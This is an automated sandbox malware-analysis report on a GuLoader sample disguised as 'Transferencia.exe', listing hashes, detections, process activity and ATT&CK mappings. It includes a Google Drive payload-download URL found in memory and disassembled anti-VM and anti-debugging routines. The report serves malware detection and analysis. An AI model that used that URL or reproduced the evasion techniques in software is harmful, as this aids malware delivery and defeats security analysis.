Play interactive tour

Edit tour

Analysis Report Transferencia

Overview

General Information

Sample Name:	Transferencia (renamed file extension from none to exe)
Analysis ID:	384290
MD5:	7c22c3e3b8726dd1b03e69c203590026
SHA1:	7715be6b73e52535d81b083a3dfd95568a729782
SHA256:	96fb89fdc3873864981ec26c355111c26c7ab5132770ead9d1d97bdfac32e566
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contain functionality to detect virtual machines

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found potential dummy code loops (likely to delay analysis)

Hides threads from debuggers

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Transferencia.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\Transferencia.exe' MD5: 7C22C3E3B8726DD1B03E69C203590026)

RegAsm.exe (PID: 7052 cmdline: 'C:\Users\user\Desktop\Transferencia.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Transferencia.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 7080	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Transferencia.exe	Virustotal: Detection: 28%			Perma Link
Source: Transferencia.exe	ReversingLabs: Detection: 68%

Machine Learning detection for sample

Show sources

Source: Transferencia.exe

Joe Sandbox ML: detected

Source: Transferencia.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: RegAsm.exe, 0000000B.00000002.902853536.000000000133A000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cUL0K7dYgbhK7vN-RFg
Source: RegAsm.exe, 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cUL0K7dYgbhK7vN-RFgTfWB-AllHwx8q

Source: C:\Users\user\Desktop\Transferencia.exe

Code function: 0_2_004145B8 OpenClipboard,

0_2_004145B8

Source: C:\Users\user\Desktop\Transferencia.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01372C3F NtSetInformationThread,	11_2_01372C3F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137849A NtProtectVirtualMemory,	11_2_0137849A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370724 EnumWindows,NtSetInformationThread,	11_2_01370724
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370BF8 NtSetInformationThread,LoadLibraryA,	11_2_01370BF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137096A NtSetInformationThread,	11_2_0137096A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370942 NtSetInformationThread,	11_2_01370942
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137099A NtSetInformationThread,	11_2_0137099A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013709FC NtSetInformationThread,	11_2_013709FC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013769E2 NtSetInformationThread,	11_2_013769E2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013709C6 NtSetInformationThread,	11_2_013709C6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01376409 NtSetInformationThread,LoadLibraryA,	11_2_01376409
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370878 NtSetInformationThread,	11_2_01370878
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137846D NtProtectVirtualMemory,	11_2_0137846D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137844B NtProtectVirtualMemory,	11_2_0137844B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137084A NtSetInformationThread,	11_2_0137084A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370848 NtSetInformationThread,	11_2_01370848
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013708BA NtSetInformationThread,	11_2_013708BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013764F1 NtSetInformationThread,	11_2_013764F1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013708E7 NtSetInformationThread,	11_2_013708E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01377BEA NtSetInformationThread,	11_2_01377BEA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370A24 NtSetInformationThread,	11_2_01370A24
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370A6E NtSetInformationThread,	11_2_01370A6E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370AC7 NtSetInformationThread,	11_2_01370AC7

Source: Transferencia.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exeFE2X vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exeFE2X0 vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exeFE2XG vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exeFE2X5 vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exeFE2Xx vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000002.903176673.00000000020A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs Transferencia.exe
Source: Transferencia.exe, 00000000.00000000.633684850.0000000000419000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameYCIETRA.exe vs Transferencia.exe
Source: Transferencia.exe	Binary or memory string: OriginalFilenameYCIETRA.exe vs Transferencia.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: Transferencia.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal96.troj.evad.winEXE@4/0@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_01

Source: C:\Users\user\Desktop\Transferencia.exe

File created: C:\Users\user\AppData\Local\Temp\~DF41317356142881DA.TMP

Jump to behavior

Source: Transferencia.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Transferencia.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Transferencia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Transferencia.exe	Virustotal: Detection: 28%
Source: Transferencia.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\Transferencia.exe 'C:\Users\user\Desktop\Transferencia.exe'
Source: C:\Users\user\Desktop\Transferencia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Transferencia.exe'
Source: C:\Users\user\Desktop\Transferencia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Transferencia.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000B.00000002.902860214.0000000001370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7080, type: MEMORY

Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00404E48 pushfd ; iretd	0_2_00404E49
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00404049 pushfd ; iretd	0_2_0040404D
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_0040904D push eax; ret	0_2_00409056
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_004020CE pushfd ; iretd	0_2_004020FD
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00402EEA push dword ptr [edi-4B012F33h]; retf	0_2_00402EFD
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_004020FE pushfd ; iretd	0_2_00402101
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00407E96 push esi; iretd	0_2_00407E9D
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_0040336C push fs; ret	0_2_00403405
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00408F70 push eax; ret	0_2_00408F7E
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00408976 push eax; ret	0_2_0040897A
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00402302 pushfd ; iretd	0_2_00402305
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_0040911A push eax; iretd	0_2_00409182
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00402BD9 pushfd ; iretd	0_2_00402BE1
Source: C:\Users\user\Desktop\Transferencia.exe	Code function: 0_2_00402F92 pushfd ; iretd	0_2_00402F95

Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files\Qemu-ga\qemu-ga.exe		11_2_01374236
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files\Qemu-ga\qemu-ga.exe		11_2_0137421B

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370CFF LoadLibraryA,	11_2_01370CFF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370BF8 NtSetInformationThread,LoadLibraryA,	11_2_01370BF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370D04	11_2_01370D04
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01371DBB LoadLibraryA,	11_2_01371DBB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370C23	11_2_01370C23
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370CBA	11_2_01370CBA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01370B8E	11_2_01370B8E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01377E0C LoadLibraryA,	11_2_01377E0C

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000423DB0 second address: 0000000000423DB0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F48AD0D24F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test al, bl 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 jmp 00007F48AD0D2512h 0x00000024 cmp dh, 00000056h 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007F48AD0D244Ch 0x00000031 push ecx 0x00000032 jmp 00007F48AD0D2512h 0x00000034 push esi 0x00000035 jmp 00007F48AD0D2537h 0x00000037 call 00007F48AD0D24CCh 0x0000003c pop esi 0x0000003d jmp esi 0x0000003f pop esi 0x00000040 call 00007F48AD0D2568h 0x00000045 call 00007F48AD0D2508h 0x0000004a lfence 0x0000004d mov edx, dword ptr [7FFE0014h] 0x00000053 lfence 0x00000056 ret 0x00000057 mov esi, edx 0x00000059 pushad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000427E3E second address: 0000000000427E3E instructions:
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000420CE2 second address: 0000000000420CE2 instructions:

Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000423DB0 second address: 0000000000423DB0 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F48AD0D24F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test al, bl 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 jmp 00007F48AD0D2512h 0x00000024 cmp dh, 00000056h 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007F48AD0D244Ch 0x00000031 push ecx 0x00000032 jmp 00007F48AD0D2512h 0x00000034 push esi 0x00000035 jmp 00007F48AD0D2537h 0x00000037 call 00007F48AD0D24CCh 0x0000003c pop esi 0x0000003d jmp esi 0x0000003f pop esi 0x00000040 call 00007F48AD0D2568h 0x00000045 call 00007F48AD0D2508h 0x0000004a lfence 0x0000004d mov edx, dword ptr [7FFE0014h] 0x00000053 lfence 0x00000056 ret 0x00000057 mov esi, edx 0x00000059 pushad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000424092 second address: 0000000000424092 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F48ACAC7A70h 0x0000001d popad 0x0000001e call 00007F48ACAC4545h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000427E3E second address: 0000000000427E3E instructions:
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000420CE2 second address: 0000000000420CE2 instructions:
Source: C:\Users\user\Desktop\Transferencia.exe	RDTSC instruction interceptor: First address: 0000000000420FA9 second address: 0000000000421036 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b add edi, 00010000h 0x00000011 jmp 00007F48AD0D2516h 0x00000013 test bh, ah 0x00000015 push edi 0x00000016 test ch, dh 0x00000018 add edi, 04h 0x0000001b push edi 0x0000001c pushad 0x0000001d mov ax, 0E01h 0x00000021 cmp ax, 00000E01h 0x00000025 jne 00007F48AD0D1D9Fh 0x0000002b popad 0x0000002c add edi, 04h 0x0000002f push edi 0x00000030 jmp 00007F48AD0D251Ah 0x00000032 test ecx, ebx 0x00000034 push 0003E800h 0x00000039 cmp ax, 00001CE5h 0x0000003d pushad 0x0000003e lfence 0x00000041 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001374092 second address: 0000000001374092 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F48ACAC7A70h 0x0000001d popad 0x0000001e call 00007F48ACAC4545h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001370FA9 second address: 0000000001371036 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b add edi, 00010000h 0x00000011 jmp 00007F48AD0D2516h 0x00000013 test bh, ah 0x00000015 push edi 0x00000016 test ch, dh 0x00000018 add edi, 04h 0x0000001b push edi 0x0000001c pushad 0x0000001d mov ax, 0E01h 0x00000021 cmp ax, 00000E01h 0x00000025 jne 00007F48AD0D1D9Fh 0x0000002b popad 0x0000002c add edi, 04h 0x0000002f push edi 0x00000030 jmp 00007F48AD0D251Ah 0x00000032 test ecx, ebx 0x00000034 push 0003E800h 0x00000039 cmp ax, 00001CE5h 0x0000003d pushad 0x0000003e lfence 0x00000041 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 11_2_01372C3F rdtsc

11_2_01372C3F

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

API coverage: 7.2 %

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 7056

Thread sleep time: -1020000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 11_2_01372C3F NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,?,00000000,00000000

11_2_01372C3F

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process Stats: CPU usage > 90% for more than 60s

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 11_2_01372C3F rdtsc

11_2_01372C3F

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 11_2_01375079 LdrInitializeThunk,

11_2_01375079

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013729A6 mov eax, dword ptr fs:[00000030h]	11_2_013729A6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_0137299C mov eax, dword ptr fs:[00000030h]	11_2_0137299C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013729E7 mov eax, dword ptr fs:[00000030h]	11_2_013729E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013760E3 mov eax, dword ptr fs:[00000030h]	11_2_013760E3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01373B32 mov eax, dword ptr fs:[00000030h]	11_2_01373B32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01371FD0 mov eax, dword ptr fs:[00000030h]	11_2_01371FD0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01372A37 mov eax, dword ptr fs:[00000030h]	11_2_01372A37
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01377E22 mov eax, dword ptr fs:[00000030h]	11_2_01377E22
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01376E17 mov eax, dword ptr fs:[00000030h]	11_2_01376E17
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01377E0C mov eax, dword ptr fs:[00000030h]	11_2_01377E0C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01372696 mov eax, dword ptr fs:[00000030h]	11_2_01372696
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_01372684 mov eax, dword ptr fs:[00000030h]	11_2_01372684
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 11_2_013726DC mov eax, dword ptr fs:[00000030h]	11_2_013726DC

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: Transferencia.exe, 00000000.00000002.903129431.0000000000C90000.00000002.00000001.sdmp, RegAsm.exe, 0000000B.00000002.903149361.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Transferencia.exe, 00000000.00000002.903129431.0000000000C90000.00000002.00000001.sdmp, RegAsm.exe, 0000000B.00000002.903149361.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Transferencia.exe, 00000000.00000002.903129431.0000000000C90000.00000002.00000001.sdmp, RegAsm.exe, 0000000B.00000002.903149361.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Transferencia.exe, 00000000.00000002.903129431.0000000000C90000.00000002.00000001.sdmp, RegAsm.exe, 0000000B.00000002.903149361.0000000001B80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection2	Virtualization/Sandbox Evasion421	OS Credential Dumping	Security Software Discovery921	Remote Services	Clipboard Data1	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection2	LSASS Memory	Virtualization/Sandbox Evasion421	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Transferencia.exe	29%	Virustotal		Browse
Transferencia.exe	69%	ReversingLabs	Win32.Backdoor.Convagent
Transferencia.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384290
Start date:	08.04.2021
Start time:	21:11:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Transferencia (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
